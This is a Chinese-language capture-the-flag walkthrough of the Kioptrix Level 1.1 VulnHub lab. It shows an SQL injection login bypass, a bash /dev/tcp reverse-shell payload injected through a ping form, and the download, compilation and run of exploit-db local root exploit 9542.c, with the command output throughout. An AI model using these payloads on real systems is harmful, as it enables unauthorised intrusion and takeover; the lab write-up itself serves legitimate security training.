KIOPTRIX: LEVEL 1.1 (#2) 攻略紀錄

靶機可從vulnhub下載，下載網址Kioptrix: Level 1.1 (#2) ~ VulnHub

打開靶機前，要把CentOs4.5.vmx這份文件打開，相關參數都設成NAT。

靶機用vmware開機，同時也打開自己的kali虛擬機，先確認自己的ip。

$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.44.129  netmask 255.255.255.0  broadcast 192.168.44.255
        inet6 fe80::e07:3e48:d243:fe0b  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:05:ac:79  txqueuelen 1000  (Ethernet)
        RX packets 6227  bytes 1176446 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7225  bytes 650900 (635.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

經過nmap掃描同網段。

$ nmap -sP 192.168.44.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-07 08:27 EDT
Nmap scan report for 192.168.44.2
Host is up (0.00046s latency).
Nmap scan report for 192.168.44.129
Host is up (0.000039s latency).
Nmap scan report for 192.168.44.130
Host is up (0.0032s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.08 seconds

知道靶機位址是在192.168.44.130後，再去掃描它的開啟網路埠。

$ nmap -A 192.168.44.130
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-07 20:31 CST
Nmap scan report for 192.168.44.130
Host is up (0.68s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 851/udp status
|_ 100024 1 854/tcp status
443/tcp open ssl/https?
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2022-10-07T09:21:45+00:00; -3h09m37s from scanner time.
631/tcp open ipp CUPS 1.1
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
3306/tcp open mysql MySQL (unauthorized)

Host script results:
|_clock-skew: -3h09m37s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.34 seconds
Segmentation fault

可以發現有80port，就直接網址打靶機位址連上網頁。

接下來可以試試sql injection，在Username輸入

' or 1 = 1 #-- -

Password隨便打沒關係，按下login以後會進到這個網頁:

是一個提供 ping 功能的頁面，聯想到 Command-Injection，所以乾脆試試reverse shell。

先在攻擊機輸入

nc -lvvp 1234

接下來在網頁上的Ping a Machine on the Network:欄位，填上以下命令:

;bash -i >& /dev/tcp/172.25.46.188/1234 0>&1

記得最前面要有分號。

這時攻擊機顯示畫面如下:

$ nc -lvvp 1234
listening on [any] 1234 ...
connect to [172.25.46.188] from DESKTOP-NRNV04H.mshome.net [172.25.32.1] 50926
bash: no job control in this shell
bash-3.00$

雖然可以操控了，但其實也不是root:

bash-3.00$ whoami
apache

為了提權，要開始找漏洞了。想找漏洞，就要先知道版本號，其實前面nmap掃到Apache/2.0.52可能也可以用，不過可以找找別的版本號，這裡先找inux內核版本。

bash-3.00$ cat /proc/version
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007

再找OS版本

bash-3.00$ lsb_release -a
LSB Version:      :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description:    CentOS release 4.5 (Final)
Release:        4.5
Codename:       Final

再用searchsploit找找看有沒有相關的攻擊腳本:

$ searchsploit CentOS 4.5
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) -  | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'i | linux_x86/local/9542.c
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation         | linux/local/35370.c
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

可以發現中間那個Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'i大概可以用。

把攻擊腳本9542.c複製到一個新資料夾，在這裡我是複製到target_machine/kipotrix_1.1這個資料夾底下。

cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c target_machine/kipotrix_1.1

然後命令列cd到target_machine/kipotrix_1.1，在這目錄底下開啟伺服器

┌──(kali㉿kali)-[~]
└─$ cd target_machine/kipotrix_1.1                                                                                                                                                     
┌──(kali㉿kali)-[~/target_machine/kipotrix_1.1]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.44.1 - - [09/Oct/2022 07:39:10] "GET / HTTP/1.1" 200 -
192.168.44.1 - - [09/Oct/2022 07:39:11] code 404, message File not found
192.168.44.1 - - [09/Oct/2022 07:39:11] "GET /favicon.ico HTTP/1.1" 404 -
192.168.44.130 - - [09/Oct/2022 07:39:40] "GET /9542.c HTTP/1.0" 200 -
192.168.44.130 - - [09/Oct/2022 07:44:39] "GET /9542.c HTTP/1.0" 200 -

這樣就可以wget http://192.168.44.129:8000/9542.c，從攻擊機下載檔案。

bash-3.00$ wget http://192.168.44.129:8000/9542.c
--10:00:51--  http://192.168.44.129:8000/9542.c
           => `9542.c'
Connecting to 192.168.44.129:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,535 (2.5K) [text/x-csrc]
9542.c: Permission denied

Cannot write to `9542.c' (Permission denied).

發現下載到根目錄會Permission denied，要cd到別的目錄?檢查是否有其他隱藏目錄。

bash-3.00$ cd /tmp
bash-3.00$ pwd
/tmp
bash-3.00$ wget http://192.168.44.129:8000/9542.c
--16:50:35--  http://192.168.44.129:8000/9542.c
           => `9542.c'
Connecting to 192.168.44.129:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,535 (2.5K) [text/x-csrc]

    0K ..                                                    100%   80.59 MB/s

16:50:35 (80.59 MB/s) - `9542.c' saved [2535/2535] 
bash-3.00$ gcc 9542.c -o 9542
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
9542
9542.c
bash-3.00$ ./9542
sh: no job control in this shell
sh-3.00# whoami
root

下載攻擊腳本並編譯成功，執行以後拿到root權限。

接下來想要catch the flag，於是去找所有檔名含有root的資料夾與檔案:

sh-3.00# updatedb
sh-3.00# locate root
/root
/root/.bashrc
/root/.mysql_history
/root/.bash_profile
/root/.bash_history
/root/.tcshrc
/root/install.log.syslog
/root/.cshrc
/root/install.log
/root/anaconda-ks.cfg
/root/.bash_logout
/dev/root
/var/spool/mail/root
/var/lib/Pegasus/repository/root
/var/lib/Pegasus/repository/root/classes
/var/lib/Pegasus/repository/root/qualifiers
/var/lib/Pegasus/repository/root/instances
/var/lib/Pegasus/repository/root#PG_InterOp
/var/lib/Pegasus/repository/root#PG_InterOp/classes
/var/lib/Pegasus/repository/root#PG_InterOp/classes/CIM_ProductPhysicalComponent.CIM_Component
/var/lib/Pegasus/repository/root#PG_InterOp/classes/CIM_ProcessIndication.CIM_Indication
...一大堆
/var/lib/Pegasus/repository/root#PG_Internal/instances
/sbin/pivot_root
/usr/include/linux/atari_rootsec.h
/usr/sbin/rootflags
/usr/sbin/chroot
/usr/share/doc/pam-0.77/txts/README.pam_rootok
/usr/share/doc/pam-0.77/txts/README.pam_chroot
/usr/share/doc/rpm-4.3.3/buildroot
/usr/share/doc/rpm-devel-4.3.3/apidocs/html/buildroot-source.html
/usr/share/doc/rpm-devel-4.3.3/apidocs/html/buildroot.html
/usr/share/zsh/4.2.0/functions/_fakeroot
/usr/share/locale/ur/LC_MESSAGES/system-config-rootpassword.mo
...一大堆
/usr/share/locale/ru/LC_MESSAGES/system-config-rootpassword.mo
/usr/share/man/man8/pivot_root.8.gz
/usr/share/man/man8/rootflags.8.gz
/usr/share/man/man1/gpm-root.1.gz
/usr/share/man/man1/chroot.1.gz
/usr/share/man/man3/selinux_policyroot.3.gz
/usr/share/man/man2/pivot_root.2.gz
/usr/share/man/man2/chroot.2.gz
/usr/share/system-config-rootpassword
/usr/share/system-config-rootpassword/system-config-rootpassword
/usr/share/system-config-rootpassword/system-config-rootpassword.py
/usr/share/system-config-rootpassword/pixmaps
/usr/share/system-config-rootpassword/pixmaps/system-config-rootpassword.png
/usr/share/system-config-rootpassword/passwordDialog.py
/usr/share/applications/system-config-rootpassword.desktop
/usr/share/icons/hicolor/48x48/apps/system-config-rootpassword.png
/usr/share/firstboot/modules/rootpassword.py
/usr/share/umb-scheme/slib/root.scm
/usr/lib/perl5/5.8.5/i386-linux-thread-multi/linux/atari_rootsec.ph
/usr/lib/python2.3/site-packages/Ft/Server/ThirdParty/pyftpd/auth_chroot_config.py
/usr/lib/python2.3/site-packages/Ft/Server/ThirdParty/pyftpd/auth_chroot_module.pyc
/usr/lib/python2.3/site-packages/Ft/Server/ThirdParty/pyftpd/auth_chroot_module.py
/usr/lib/python2.3/site-packages/Ft/Server/ThirdParty/pyftpd/auth_chroot_config.pyo
/usr/lib/python2.3/site-packages/Ft/Server/ThirdParty/pyftpd/auth_chroot_module.pyo
/usr/lib/python2.3/site-packages/Ft/Server/ThirdParty/pyftpd/auth_chroot_config.pyc
/usr/src/kernels/2.6.9-55.EL-i686/include/linux/root_dev.h
/usr/src/kernels/2.6.9-55.EL-i686/include/config/usb/ehci/root
/usr/src/kernels/2.6.9-55.EL-i686/include/config/usb/ehci/root/hub
/usr/src/kernels/2.6.9-55.EL-i686/include/config/usb/ehci/root/hub/tt.h
/usr/src/kernels/2.6.9-55.EL-i686/include/config/security/rootplug.h
/usr/src/kernels/2.6.9-55.EL-hugemem-i686/include/linux/root_dev.h
/usr/src/kernels/2.6.9-55.EL-hugemem-i686/include/config/usb/ehci/root
/usr/src/kernels/2.6.9-55.EL-hugemem-i686/include/config/usb/ehci/root/hub
/usr/src/kernels/2.6.9-55.EL-hugemem-i686/include/config/usb/ehci/root/hub/tt.h
/usr/src/kernels/2.6.9-55.EL-hugemem-i686/include/config/security/rootplug.h
/usr/src/kernels/2.6.9-55.EL-smp-i686/include/linux/root_dev.h
/usr/src/kernels/2.6.9-55.EL-smp-i686/include/config/usb/ehci/root
/usr/src/kernels/2.6.9-55.EL-smp-i686/include/config/usb/ehci/root/hub
/usr/src/kernels/2.6.9-55.EL-smp-i686/include/config/usb/ehci/root/hub/tt.h
/usr/src/kernels/2.6.9-55.EL-smp-i686/include/config/security/rootplug.h
/usr/bin/gpm-root
/usr/bin/system-config-rootpassword
/etc/selinux/targeted/contexts/users/root
/etc/gpm-root.conf
/etc/pam.d/system-config-rootpassword
/etc/security/console.apps/system-config-rootpassword
/etc/security/chroot.conf
/lib/security/pam_chroot.so
/lib/security/pam_rootok.so

最可疑的就是/var/spool/mail/root。

sh-3.00# cat /var/spool/mail/root
From MAILER-DAEMON@kioptrix.level2  Fri Oct  7 04:57:46 2022
Return-Path: <MAILER-DAEMON@kioptrix.level2>
Received: from localhost (localhost)
        by kioptrix.level2 (8.13.1/8.13.1) id 2978vkJT002499;
        Fri, 7 Oct 2022 04:57:46 -0400
Date: Fri, 7 Oct 2022 04:57:46 -0400
From: Mail Delivery Subsystem <MAILER-DAEMON@kioptrix.level2>
Message-Id: <202210070857.2978vkJT002499@kioptrix.level2>
To: postmaster@kioptrix.level2
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
        boundary="2978vkJT002499.1665133066/kioptrix.level2"
Subject: Postmaster notify: see transcript for details
Auto-Submitted: auto-generated (postmaster-notification)

This is a MIME-encapsulated message

--2978vkJT002499.1665133066/kioptrix.level2

The original message was received at Thu, 9 Feb 2012 22:39:59 -0400
from localhost
with id q1A3dxnO003116

   ----- The following addresses had permanent fatal errors -----
<root@kioptrix.level2>

   ----- Transcript of session follows -----
451 kioptrix.level2: Name server timeout
Message could not be delivered for 5 days
Message will be deleted from queue

--2978vkJT002499.1665133066/kioptrix.level2
Content-Type: message/delivery-status

Reporting-MTA: dns; kioptrix.level2
Arrival-Date: Thu, 9 Feb 2012 22:39:59 -0400

Final-Recipient: RFC822; root@kioptrix.level2
Action: failed
Status: 4.4.7
Last-Attempt-Date: Fri, 7 Oct 2022 04:57:46 -0400

--2978vkJT002499.1665133066/kioptrix.level2
Content-Type: message/rfc822

Return-Path: <MAILER-DAEMON>
Received: from localhost (localhost)
        by kioptrix.level2 (8.13.1/8.13.1) id q1A3dxnO003116;
        Thu, 9 Feb 2012 22:39:59 -0500
Date: Thu, 9 Feb 2012 22:39:59 -0500
From: Mail Delivery Subsystem <MAILER-DAEMON>
Message-Id: <201202100339.q1A3dxnO003116@kioptrix.level2>
To: <root@kioptrix.level2>
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
        boundary="q1A3dxnO003116.1328845199/kioptrix.level2"
Subject: Returned mail: see transcript for details
Auto-Submitted: auto-generated (failure)

This is a MIME-encapsulated message

--q1A3dxnO003116.1328845199/kioptrix.level2

The original message was received at Mon, 12 Oct 2009 04:02:04 -0500
from localhost.localdomain [127.0.0.1]

   ----- The following addresses had permanent fatal errors -----
<root@kioptrix.level2>

   ----- Transcript of session follows -----
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
Message could not be delivered for 5 days
Message will be deleted from queue
451 kioptrix.level2: Name server timeout

--q1A3dxnO003116.1328845199/kioptrix.level2
Content-Type: message/delivery-status

Reporting-MTA: dns; kioptrix.level2
Arrival-Date: Mon, 12 Oct 2009 04:02:04 -0500

Final-Recipient: RFC822; root@kioptrix.level2
Action: failed
Status: 4.4.7
Last-Attempt-Date: Thu, 9 Feb 2012 22:39:59 -0500

--q1A3dxnO003116.1328845199/kioptrix.level2
Content-Type: message/rfc822

Return-Path: <root@kioptrix.level2>
Received: from kioptrix.level2 (localhost.localdomain [127.0.0.1])
        by kioptrix.level2 (8.13.1/8.13.1) with ESMTP id n9C824DR003890
        for <root@kioptrix.level2>; Mon, 12 Oct 2009 04:02:04 -0400
Received: (from root@localhost)
        by kioptrix.level2 (8.13.1/8.13.1/Submit) id n9C824Nj003888
        for root; Mon, 12 Oct 2009 04:02:04 -0400
Date: Mon, 12 Oct 2009 04:02:04 -0400
From: root <root@kioptrix.level2>
Message-Id: <200910120802.n9C824Nj003888@kioptrix.level2>
To: root@kioptrix.level2
Subject: LogWatch for kioptrix.level2


 ################### LogWatch 5.2.2 (06/23/04) ####################
       Processing Initiated: Mon Oct 12 04:02:04 2009
       Date Range Processed: yesterday
     Detail Level of Output: 0
          Logfiles for Host: kioptrix.level2
 ################################################################

 --------------------- SSHD Begin ------------------------

SSHD Killed: 1 Time(s)

 ---------------------- SSHD End -------------------------



------------------ Disk Space --------------------

/dev/mapper/VolGroup00-LogVol00
                      3.3G  1.5G  1.7G  47% /
/dev/hda1              99M  9.3M   85M  10% /boot


 ###################### LogWatch End #########################


--q1A3dxnO003116.1328845199/kioptrix.level2--


--2978vkJT002499.1665133066/kioptrix.level2--

留下的疑問: 如何確定網頁有SQL injection跟command injection漏洞? 如果有漏洞，要用什麼語句打?